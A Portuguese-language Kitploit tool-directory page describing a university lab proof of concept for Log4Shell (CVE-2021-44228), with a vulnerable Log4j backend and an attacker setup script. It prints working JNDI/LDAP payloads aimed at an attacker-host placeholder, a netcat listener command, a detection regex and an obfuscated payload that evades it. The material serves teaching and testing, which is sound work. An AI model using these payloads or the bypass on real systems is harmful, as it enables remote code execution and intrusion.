Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
TPASLog4ShellPoC — Prova de Conceito para a vulnerabilidade Log4Shell (CVE-2021-44228), desenvolvida como parte do trabalho da unidade curricular TPAS no Mestrado em Segurança da Informação da FCUP. | Kitploit
Ferramentas/GitHubGitHub/carlos-mesquita/tpaslog4shellpoc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebBypass de WAFAprendizado e EducaçãoArchived
GitHubcarlos-mesquita/tpaslog4shellpoc

TPASLog4ShellPoC

Prova de Conceito para a vulnerabilidade Log4Shell (CVE-2021-44228), desenvolvida como parte do trabalho da unidade curricular TPAS no Mestrado em Segurança da Informação da FCUP.

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

TPAS Log4Shell PoC

Este repositório contém uma Prova de Conceito (PoC) para a vulnerabilidade Log4Shell (CVE-2021-44228), desenvolvida como parte do trabalho da unidade curricular TPAS no Mestrado em Segurança Informática na FCUP.

Ele apresenta:

  • Um frontend React SPA que simula um site de e-commerce genérico com funcionalidades básicas como navegar por produtos e visualizar detalhes básicos como descrição, preço, avaliação, etc., fornecidos através da API dummy JSON https://dummyjson.com/docs/products
  • Um backend REST API Spring Boot que utiliza uma versão vulnerável do Log4j 2.14.
  • Um script bash que configura a maior parte do lado do atacante necessária para explorar o Log4Shell.

Para executar esta stack você precisa de:

  • No anfitrião alvo:
    • Instalar o docker
    • Substituir o <target_ip> na variável de ambiente NEXT_PUBLIC_BACKEND_URL no docker-compose.yaml
    • Executar docker-compose up
  • No anfitrião atacante:
    • Instalar java, python e maven
    • Abrir as portas necessárias, execute "./init.sh --help" para ver as portas e o que o script faz
    • Executar o script init.sh
    • Executar um listener netcat, nc -lvnp

Quando tudo estiver a correr:

Coloque este payload na barra de pesquisa (codificado em URL, pois estará num parâmetro de consulta GET):

root@kitploit:~
%24%7Bjndi%3Aldap%3A%2F%2F<attacker_host_ip>%3A<ldap_port>%2FExploit%7D

Ou coloque este payload nos cabeçalhos de um pedido (pode usar o burp suite para intercetar um pedido e adulterá-lo):

root@kitploit:~
${jndi:ldap://<attacker_host_ip>:<ldap_port>/Exploit}

No site, existe um ícone junto ao nome do utilizador que permite alternar entre sanitizar a string registada usando a expressão regular \$\{jndi:.*?} ou não. Por predefinição, a sanitização está desativada, representada por um ícone de demónio vermelho. Quando a sanitização está ativada, o ícone muda para uma carinha sorridente verde.

Esta funcionalidade pode ser usada como forma de simular um bypass de WAF; pode adicionar mais expressões regulares na classe LoggerManager.java do backend.

Aqui está um payload que não será correspondido pela expressão regular atual:

root@kitploit:~
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://<attacker_host_ip>:<ldap_port>/Exploit}
Baixar ferramenta